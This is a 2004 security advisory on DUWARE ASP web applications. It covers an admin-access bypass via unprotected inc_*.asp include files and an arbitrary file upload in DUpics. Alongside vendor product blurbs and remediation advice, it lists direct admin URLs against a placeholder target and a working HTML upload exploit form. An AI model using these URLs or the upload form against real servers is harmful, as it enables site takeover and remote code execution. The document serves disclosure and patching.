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[SCSA-026] DUWARE Products Admin Access and Arbitrary File Upload Vulnerability

Security Corporation Security Advisory [SCSA-026]

DUWARE Products Admin Access and Arbitrary File Upload Vulnerability

HOMEPAGE: http://www.duware.com
Product : DUcalendar
Versions : 1.0, 1.1
Product : DUclassified
Versions : 4.0, 4.1
Product : DUdirectory
Version : 3.0
Product : DUdownload
Version : 1.0
Product : DUgallery
Versions : 3.0, 3.1, 3.2, 3.3
Product : DUpics
Version : 3.0
Product : DUportal
Version : 3.0
Product : DUarticle
Version : 1.0
Product : DUclassmate
Version : 1.0
Product : DUpoll
Version : 3.0
Product : DUnews
Version : 1.0
Product : DUamazon
Version : 3.0
Product : DUpaypal
Version : 3.0
Product : DUfaq
Version : 1.0
Product : DUforum
Version : 3.0
IMPACT: Admin Access
Arbitrary File Upload

RELEASE DATE: 2004-01-20


6..................................................DISCLOSURE TIMELINE


Product : DUcalendar
Versions : 1.0, 1.1

DUcalendar is a free Event Calendar application. Backend by Access 
database, DUcalendar can store thousands of events in category. 
Each event is displayed with full detail and description, also with
its related events. You can customize DUcalendar to list only the
events that you want to offer your visitors such as about Internet,
TV, games, or convert. DUcalendar is an excellent add-on for your
Web site. Start building communities and attracting more visitors
to your site by using this free application.

Product : DUclassified
Versions : 4.0, 4.1

DUclassified is a free Classified Ad Management application. Backend
by Access database, DUclassified can store thousands of classified 
ads in category. Each classified ad is displayed with picture, full
detail and description. Visitors can contact the ad's owner via a 
form. Ad' owners can manage their ads via a user-friendly panel. 
DUclassified is an excellent add-on for your Web site. Start 
building communities and attracting more visitors to your site by
using this free application.

Product : DUdirectory
Version : 3.0

DUdirectory is a free Links Listing Web application. Backend by 
Access database, DUdirectory can store thousands of links in 
category. Each link is displayed with full detail and description,
also with its related links. You can customize DUdirectory to list
only the links that you want to offer your visitors such as about
Internet, books, games, or music. DUdirectory is an excellent add-on
for your Web site. Start building communities and attracting more 
visitors to your site by using this free application.

Product : DUdownload
Version : 1.0

DUdownload is a free Files Listing application. Backend by Access
database, DUdownload can store thousands of file urls in category.
Each file is displayed with full detail and description, also with
its related files. You can customize DUdownload to list only the 
file urls that you want to offer your visitors such as about Internet,
books, games, or music. DUdownload is an excellent add-on for your
Web site. Start building communities and attracting more visitors to
your site by using this free application

Product : DUgallery
Versions : 3.0, 3.1, 3.2, 3.3

DUclassified is a free Classified Ad Management application. Backend 
by Access database, DUclassified can store thousands of classified ads
in category. Each classified ad is displayed with picture, full detail
and description. Visitors can contact the ad's owner via a form. Ad' 
owners can manage their ads via a user-friendly panel. DUclassified is
an excellent add-on for your Web site. Start building communities and
attracting more visitors to your site by using this free application.

Product : DUpics
Version : 3.0

DUpics is a free Picture Voting application. Backend by Access database,
DUpics can store thousands of pictures. Visitors can submit their own 
pictures for others to vote. After each vote, the picture will be shown
on the side together with its average voting value. There is also a 
gallery of all pictures with their stats. DUpics is an excellent add-on
for your Web site. Start building communities and attracting more 
visitors to your site by using this free application.

Product : DUportal
Version : 3.0

DUportal is a free Web portal and online community. Backed end by Access
database, DUportal contains numerous advanced features such as Web-based
administration, Articles, Banner Ads, Event Calendar, Classified Ads, Web
link directory, Downloads, Message Board, Picture Gallery, News, 
E-Commerce, Polls and Business Directory, and more which can be downloaded
online. All modules are customizable via Web-based Admin panel, together
with size, skins and themes. DUportal is an excellent solution for your 
Web portal and online community needs. Start building a community online
by using this free Web application.

Product : DUarticle
Version : 1.0

DUarticle is a free Articles Listing Web application. Backend by Access 
database, DUarticle can store thousands of articles in category. Each 
article is displayed with full detail and description, also with its 
related articles. You can customize DUarticle to list only the articles
that you want to offer your visitors such as about Internet, books, 
games, or music. DUarticle is an excellent add-on for your Web site. 
Start building communities and attracting more visitors to your site by
using this free application.

Product : DUclassmate
Version : 1.0

DUclassmate is a free Classmates Listing & Friends Search Web application.
Backend by Access database, DUclassmate can store unlimited number of 
alumni organized within states, cities and schools. Each entry is displayed
with with old and new names, address, bio. and more. 
DUclassmate is an excellent add-on for your Web site. Start building 
communities and attracting more visitors to your site by using this
free application. 

Product : DUpoll
Version : 3.0

DUpoll is a free Poll Manager application. Backend by Access database, 
DUpoll provides you unlimited numbers polls and choices. You can place 
the active poll anywhere on your Web page. DUpoll uses Cookies to prevent
users from voting on one poll more than once. Poll result is presented 
with bar graph and numbers of votes for each choice, together with the 
percentage. Start building communities and attracting more visitors to
your site by using this free application.

Product : DUnews
Version : 1.0

DUnews is a free News Listing Web application. Backend by Access database,
DUnews can store thousands of news articles in category. Each news article
is displayed with full detail and description, also with its related articles.
You can customize DUnews to list only the articles that you want to offer 
your visitors such as about Internet, books, games, or music. DUnews is an 
excellent add-on for your Web site. Start building communities and attracting
more visitors to your site by using this free application.

Product : DUamazon
Version : 3.0

DUamazon is a free Web storefront for affiliates of Amazon. Backend by Access
database, DUamazon can store thousands of Amazon's products in category with
product images. Each product is displayed with full detail and description, 
also with its related products. You can customize DUamazon to list only the 
products that you want to offer your visitors such as books, games, or music.
DUamazon is an excellent add-on for your Web site. Start earning up to 15% 
commission and attracting more visitors to your site by using this 
free application.

Product : DUpaypal
Version : 3.0

DUpaypal is a free Paypal-based E-Commerce storefront. Backend by Access
database, DUpaypal can store thousands of products in category with images.
Each product is displayed with full detail and description, also with its 
related products. You can customize DUpaypal to sell only the products that
you want to offer your customers such as books, games, or CDs or clothes. 
DUpaypal is an excellent add-on for your Web site. Start selling your products
and attracting more customers to your site by using this free application. 

Product : DUfaq
Version : 1.0

DUfaq is a free Knowledge Base Web application. Backend by Access database, 
DUfaq can store unlimited number of questions and answers organized in category.
Each question is displayed with full detail and answer, also with its related 
questions. You can customize DUfaq to list only the questions that you want to
offer your visitors such as about Customer Support, Shipping and Handling, etc. 
DUfaq is an excellent add-on for your Web site. Start building communities and 
attracting more visitors to your site by using this free application. 

Product : DUforum
Version : 3.0

DUforum is a free Message Board application. Backend by Access database, 
DUforum can store unlimited numbers of messages and forums. 
DUforum is an excellent add-on for your Web site. Attract more visitors to
your site by using this free application. 

(direct quote from DUWARE website)


- Admin Access :

A vulnerability has been discovered in DUWARE Products, which allows
malicious users to become administrators

This vulnerability affect all products of DUware. 
For example we use the DUcalendar product and its /admin/edit.asp file. 

Here the vulnerable code :

<% Response.Buffer = True %>
<title>DUcalendar 1.0</title>
<link href="../assets/DUcalendar.css" rel="stylesheet" type="text/css">
<body background="../assets/bg_main.gif" >
<table width="760" border="0" cellspacing="2" cellpadding="0">
<!--#include file="inc_header.asp" -->

<table width="100%" border="0" cellpadding="0" cellspacing="1" 
<td bgcolor="#FFFFFF">

<!--#include file="inc_menu.asp" -->
<!--#include file="inc_edit.asp" -->

<!--#include file="inc_footer.asp" -->

We can see that files inc_menu.asp and inc_edit.asp are included.

The file inc_menu.asp contains the security code preventing 
the access to the edit.asp file :

Here the vulnerable code :

' *** Restrict Access To Page: Grant or deny access to this page
If Session("MM_Username") <> "" Then
If (true Or CStr(Session("MM_UserAuthorization"))="") Or _
MM_grantAccess = true
End If
End If
If Not MM_grantAccess Then
MM_qsChar = "?"
If (InStr(1,MM_authFailedURL,"?") >= 1) Then MM_qsChar = "&"
MM_referrer = Request.ServerVariables("URL")
if (Len(Request.QueryString()) > 0) Then MM_referrer = MM_referrer & "?" & 
MM_authFailedURL = MM_authFailedURL & MM_qsChar & "accessdenied=" & 
End If

This code of security is present in all the applications of DUware.

The problem is essentially due to 3 elements:
- All the administrator's code is in the file
- A file is includes allowing the connection to the data base:
<!--#include file="../Connections/connDUcalendarAdmin.asp" -->
- No check of the administrator's rights is made in this file.
(Given that it was already made in the edit.asp file)

- Arbitrary File Upload :

A vulnerability has been identified in DUpics allowing malicious users to
upload and execute arbitrary code by bypassing javascript filter.


- Admin Access :

- http://[target]/admin/inc_edit.asp?iEve=1
- http://[target]/admin/inc_events.asp
- http://[target]/admin/inc_type.asp

>> DUclassified :
- http://[target]/admin/inc_cats.asp
- http://[target]/admin/inc_users.asp
- http://[target]/admin/inc_user_edit.asp?id=admin

>> DUdirectory :
- http://[target]/admin/inc_links.asp
- http://[target]/admin/inc_edit.asp?iLink=10
- http://[target]/admin/inc_type.asp

>> DUdownload :
- http://[target]/admin/inc_files.asp
- http://[target]/admin/inc_edit.asp?iFile=50
- http://[target]/admin/inc_type.asp

>> DUgallery :
- http://[target]/admin/inc_pictures.asp
- http://[target]/admin/inc_edit.asp?iPic=100
- http://[target]/admin/inc_type.asp

>> DUpics :
- http://[target]/admin/inc_add.asp
- http://[target]/admin/inc_pics.asp
- http://[target]/admin/inc_edit.asp?iPic=500
- http://[target]/admin/inc_type.asp

>> DUportal :
- http://[target]/admin/inc_channel_listing.asp
- http://[target]/admin/inc_channel_edit.asp?iChannel=5
- http://[target]/admin/inc_config.asp
- http://[target]/admin/inc_users.asp
- http://[target]/admin/inc_users_edit.asp?iUser=admin


- Arbitrary File Upload :

>> DUpics :

<head><title>DUpics 3.0 Arbitrary File Upload Exploit</title></head>
<form action="/admin/inc_add.asp?GP_upload=true" method="post" 
onsubmit="this.action=this.url.value+this.action;alert('Your file will be 
uploaded to '+this.url.value+'/pictures/');">
Target URL : <input type="text" name="url" 
FILE : <input name="PIC_IMAGE" type="file"><br>
<input type="hidden" name="PIC_NAME" value="admin">
<input type="hidden" name="PIC_WIDTH">
<input type="hidden" name="PIC_HEIGHT">
<input type="hidden" name="PIC_APPROVED" value="1">
<input type="hidden" name="MM_insert" value="true">
<input type="submit" value="Upload" name="submit">
<p align="right">For more informations about this exploit : 
<a href="http://www.security-corporation.com/advisories-026.html"; 
target="_blank"> Security-Corporation.com</a></p>


The DUWare Services was notified and have released a fix for all products.


It is necessary to change one of three points quoted previously.
- Do not put all the code of aministration in these files
- Remove the inclusion in all inc_ files and add it in main file.
<!--#include file="../Connections/connDUcalendarAdmin.asp" -->
- Check the admin session in all inc_ files.


10/01/2004 Vulnerability discovered
12/01/2004 Vendor notified
14/01/2004 Vendor response
14/01/2004 Security Corporation clients notified
14/01/2004 Started e-mail discussions
17/01/2004 Last e-mail received
20/01/2004 Public disclosure


frog-m@n <frog-man@xxxxxxxxxxxxxxxxxxxxxxxx> from
http://www.phpsecure.info is credited with this discovery


The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information. In no event
shall the author be liable for any damages whatsoever arising out of
or in connection with the use or spread of this information. Any use
of this information is at the user's own risk.


- Original Version:

- Version Française:


Please send suggestions, updates, and comments to:

Security Corporation